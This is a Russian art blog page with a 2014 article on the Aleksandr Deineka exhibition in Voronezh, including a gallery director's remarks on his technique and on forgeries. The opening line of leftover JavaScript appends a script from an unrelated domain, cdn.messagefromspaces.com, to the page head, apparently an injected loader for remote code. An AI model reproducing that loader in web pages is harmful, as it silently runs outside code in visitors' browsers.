, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Выставка живописи и графики Александра Дейнеки

Автор: Дмитрий Алмазов | 17 Июн 2014

Воронежская выставка картинВ рамках IV Платоновского фестиваля в Воронеже, 05.06.14 открыта выставка живописи и графики Александра Дейнеки "Обожаю всяческую жизнь!"

13 картин для выставки были выделены Третьяковской галереей и основную часть работ привезли из Курской картинной галереи имени А. Дайнеки, где хранится около 1400 его произведений.

Названием выставки послужила строчка из стихотворения Маяковского "Юбилейное" - эмоциональное признание Пушкину: "Ненавижу всяческую мертвечину! Обожаю всяческую жизнь!" .

На открытии выставки, Михаил Бычков, директор международного Платоновского фестиваля искусств отметил, что  хотелось показать работы именно Дейнеки, так как он - абсолютный ровесник Андрея Платонова, в 2014 году мы отмечаем 115-летие обоих. Они были увлечены революционными преобразованиями, идеей переустройства мира. Но их взгляды и судьбы во многом контрастировали - тем интереснее их теперь сопоставлять.

автопортретДиректор Курской государственной картинной галереи имени А.А. Дейнеки, Игорь Припачкин, о картинах:

- Наследие Дейнеки довольно-таки сложное, интересное и многообразное. Основная часть работ  в России. Лучшее - в Третьяковской галерее, Курской галерее и в Русском музее. Хотя и то, что осело на Западе, тоже по-своему уникально. Как ни странно, его живописное наследие не очень велико, в отличии от Айвазовского, который оставил три тысячи картин. Однако  Дейнека проявил себя в самых разных жанрах. За ним прослеживается вся история искусства. Он обнаруживает знание итальянского Возрождения, французского модернизма. Казалось бы - простые "Купающиеся девушки" (1933, ГТГ). А постановка фигур отсылает к символизму. Посмотрите на "Футболистов" или на "Утреннюю зарядку", где фигура, которая позади, поставлена с нарушением. Но это повторение приема, когда-то распространенного в египетском и античном искусстве, поэтому искажение перспективы не воспринимается как неумелость. И это сразу делает работу современной, модернистской. Только, к сожалению, модернисты чаще всего не умели писать, как Дейнека. Он хорошо понял технику итальянской фрески. Обратите внимание - на его полотнах нет лака, он не блестит. Всегда брутален. Он мешает масло с темперой , имитируя фресковую поверхность. Мы же себе живопись как представляем - все блестит, мазки фактурные… Чаще всего за плотной и увесистой красочной массой скрывается неумение писать. Дейнека так никогда не делал. Можно смотреть по фрагментам и целиком, увеличивать детали - и убеждаться в том, что он нигде не допустил ошибки. Мы сейчас сталкиваемся с такой проблемой, как подделки под Дейнеку. Нам привозят на экспертизу множество фальсификаций. И удивительно - их же делают люди, более или менее связанные с ремеслом, но они, видимо, считают почерк Дейнеки примитивным, а сами допускают дикие ошибки! Ну и слава Богу…

Александр Дейнеко – родился в Курске, рисовал с раннего детства. В течении жизни получил художественное образование в Харькове, Москве.

В советское время пишет картины, состоящие из ярких красок, стройная вереница линий говорит о красоте заводов, о работе коллективных созиданий. Образы рабочих, полные выражения физической мощи и социальной силы, каких мы до этого не встречали у других художников.   Работал с Маяковским. Опыт работы  использовал в своих картинах, стараясь оставлять в них   только самое главное, искал форму простую и ясную, отбрасывая кучу деталей.   Полёт на аэроплане помог научиться видеть объекты в другой перспективе,  особое отношение к теме воздухоплавания проявляется во многих работах

Картины выставлялись на выставках Нью-йорка, Берлина, Парижа ещё при жизни автора.

Наследие Дейнеки довольно-таки сложное, интересное и многообразное. Он по сути своей модернист (если это и соцреализм, то в таком виде, в каком его никто больше не представлял), а модернизм предполагает некую универсальность, огромное мастерство и огромный культурный багаж.  Помимо живописи и графики, представленных на выставке, Дейнека создавал и монументальные произведения, такие как  мозаики, фрески, панно. В том числе, знаменитые работы для московского метро и практически неизвестные сегодняшнему зрителю экспонаты из музейных и частных собраний.

Подробно познакомиться с творчеством Дейнеки можно на сайте Курской  галереи www.deinekagallery.ru, где выложены книги о нём, иллюстрации его живописи, графики и скульптуры.

Автор Максакова Л.

Темы: Арт Воронеж, Новости, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress